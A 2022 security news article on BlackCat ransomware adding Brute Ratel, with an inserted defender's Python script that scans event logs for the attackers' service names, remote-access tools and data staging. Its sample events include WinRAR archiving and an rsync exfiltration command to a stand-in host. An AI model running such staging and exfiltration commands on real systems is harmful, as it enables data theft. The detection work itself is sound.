BlackCat adds Brute Ratel Pentest tool to attack Arsenal

Cybercrime, Cybercrime as a Service, Cyberwar/Attacks on Nation States

Gang targets big business in US, Europe and Asia

Prajeet Nair (@prajeetspeaks) •
July 16, 2022

BlackCat uses proven methods such as attacking vulnerable firewalls and VPNs (Source: ISMG)

The ransomware gang behind BlackCat ransomware has updated its arsenal by adding Brute Ratel, a pentesting tool with remote access features.


Sophos threat researchers claim to have been tracking this ransomware group since December 2021, after being called in to investigate at least five attacks involving this ransomware.

They observed that these attacks occur in the United States, Europe and Asia in large companies operating in different segments of the industry.

During their investigation, they discovered that the attackers were using a PowerShell command to download and execute Cobalt Strike beacons on some affected systems. The researchers also found the attackers using a tool called Brute Ratel, which offers “Cobalt Strike-like remote access functionality”.

“What we’ve seen recently with BlackCat and other attacks is that threat actors are very effective and efficient at their jobs,” Christopher Budd, senior threat research manager at Sophos, told Information Security Media Group. Budd described how the group relies on proven methods, such as attacking vulnerable firewalls and VPNs, because they still work, while also innovating to evade security defenses, including adopting the newer post-exploitation C2 framework Brute Ratel in its attacks.

The BlackCat ransomware-as-a-service group, which may be a rebrand of the DarkSide or BlackMatter ransomware groups, is also known as ALPHV. Its malware is coded with Rust, a programming language known for its fast performance and structural protections against certain types of bugs. Analysis by cybersecurity firm Varonis shows that the group is actively recruiting operators with the promise that affiliates can keep 90% of victims’ payments.

In June, BlackCat ransomware claimed the University of Pisa as a victim. The ransomware gang reportedly demanded a $4.5 million ransom after seizing the university’s computer system.

The attackers claim the ransom is a “cut price” which will increase to $5 million if not paid promptly. An Italian news site also shared a screenshot of the alleged ransom note, which contains a clock counting the minutes until the price jumps (see: BlackCat attacks the University of Pisa and demands a ransom of 4.5 million dollars).

Investigation Details

BlackCat operators penetrate enterprise networks at scale, and the researchers found that they gained entry by exploiting unpatched vulnerabilities, first disclosed in 2018, in firewall/VPN devices; in at least two cases, they pivoted to internal systems after gaining a foothold on the firewall.

“In two other cases, attackers targeted another firewall vendor’s product with a vulnerability that was disclosed last year,” Sophos researchers explain.

In one incident, Sophos investigators found that the vulnerabilities allowed the attackers to obtain VPN credentials from the firewalls and use them to connect to the VPN as authorized users.

“None of the targets used multi-factor authentication for these VPNs. The only outlier appears to have been a spear phishing attack that revealed an internal user’s VPN login credentials to the attackers,” says lead researcher Andrew Brandt at SophosLabs. “Once inside the network, attackers primarily used RDP to move laterally between computers, conducting brute-force attacks on the VPN connection against the administrator account on machines inside the network.”

The ransomware executable can spread laterally on Windows machines and is designed to target VMware ESXi hypervisor servers.

In another case, Sophos incident responders removed a compromised VPN account from the firewall and created a new credential combination. The researchers observed that the attackers ran the same exploit a second time, extracted the newly created credentials and continued attempting to encrypt the machines.

Using Remote Access Tools

After gaining a foothold in a network, the attackers install various remote access utilities on a system reachable on the network, which gives them fallback methods for remotely connecting to the target network.

Sophos investigators found that the attackers were using commercially available tools such as AnyDesk and TeamViewer and had also installed nGrok, an open-source remote access tool.

“The attackers also used PowerShell commands to download and run Cobalt Strike beacons on some machines, as well as a tool called Brute Ratel, which is a newer penetration testing suite with Cobalt Strike-like remote access capabilities,” says Brandt.

Sophos researchers discovered that the Brute Ratel binary was installed as a Windows service named wewe on an affected machine.

One of the biggest challenges for Sophos investigators was that some of the targeted organizations were running servers that had also been compromised through the Log4j vulnerability.

In addition to ransomware on the network, threat actors collected and exfiltrated sensitive data from targets and uploaded large volumes of data to Mega, a cloud storage provider.

The attackers used a third-party tool called DirLister to create a list of accessible directories and files; in some cases they used PowerView.ps1, a PowerShell script from a pentester toolkit, to enumerate the machines on the network; and in some cases they used a tool called LaZagne to extract passwords saved on various devices, the researchers say.

While collecting the files, the hackers used WinRAR to compress them into .rar archives and used rsync to download the stolen data.
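As an added illustration from the defender's side (not code from the article or from Sophos), this script triages constructed Windows event records for the behaviour described in this paragraph and in the remote-access-tools section above: a service named wewe, AnyDesk/TeamViewer/ngrok installed as services, and WinRAR and rsync launched to archive and move data. Field names follow the standard 7045 (service installed) and 4688 (process creation) event schemas; the hosts, paths and the drop.example destination are constructed.

```python
import re

# Indicators the article names: a service literally called "wewe", remote-access
# tools dropped for fallback access, and WinRAR/rsync used to stage and move data.
KNOWN_BAD_SERVICE_NAMES = {"wewe"}
REMOTE_ACCESS_TOOLS = ("anydesk", "teamviewer", "ngrok")
# "rar a <archive>.rar" / "WinRAR.exe a ..." is the add-to-archive form.
RAR_ARCHIVE = re.compile(r'\b(?:win)?rar(?:\.exe)?["\']?\s+a\b.*\.rar\b', re.I)
RSYNC = re.compile(r"\brsync(?:\.exe)?\b", re.I)

def triage_service_install(ev):
    """Event ID 7045 (System log): a new service was installed."""
    name = ev.get("ServiceName", "").lower()
    path = ev.get("ImagePath", "").lower()
    if name in KNOWN_BAD_SERVICE_NAMES:
        return "known-bad service name"
    if any(tool in name or tool in path for tool in REMOTE_ACCESS_TOOLS):
        return "remote-access tool installed as a service"
    return None

def triage_process(ev):
    """Event ID 4688 (Security log): process creation, command line included."""
    cmd = ev.get("CommandLine", "")
    if RAR_ARCHIVE.search(cmd):
        return "WinRAR archive creation (possible staging)"
    if RSYNC.search(cmd):
        return "rsync launch (possible exfiltration)"
    return None

HANDLERS = {7045: triage_service_install, 4688: triage_process}

def triage(events):
    """Return (host, event_id, reason) for every event that matches an indicator."""
    findings = []
    for ev in events:
        handler = HANDLERS.get(ev["EventID"])
        reason = handler(ev) if handler else None
        if reason:
            findings.append((ev["Host"], ev["EventID"], reason))
    return findings

# Constructed sample events (not real telemetry), including two benign ones.
SAMPLE_EVENTS = [
    {"Host": "fs01", "EventID": 7045, "ServiceName": "wewe", "ImagePath": r"C:\ProgramData\svc\wewe.exe"},
    {"Host": "ws22", "EventID": 7045, "ServiceName": "AnyDesk", "ImagePath": r"C:\ProgramData\AnyDesk\AnyDesk.exe"},
    {"Host": "dc01", "EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"Host": "fs01", "EventID": 4688, "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a -r D:\stage\finance.rar D:\shares\finance'},
    {"Host": "fs01", "EventID": 4688, "CommandLine": r"rsync.exe -avz D:\stage\ backup@drop.example::inbox"},
    {"Host": "ws22", "EventID": 4688, "CommandLine": r"C:\Windows\System32\notepad.exe"},
]
```

Running `triage(SAMPLE_EVENTS)` flags the wewe and AnyDesk service installs and the WinRAR and rsync launches, and leaves the Spooler and notepad events alone; in practice the event records come from your SIEM or from the exported event logs rather than the inline list.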

Sophos researchers say they found evidence the attackers broke into the network months before they began investigating the case. They also saw that the attackers installed “cryptomining software on 16 servers inside the company’s network in early November.”
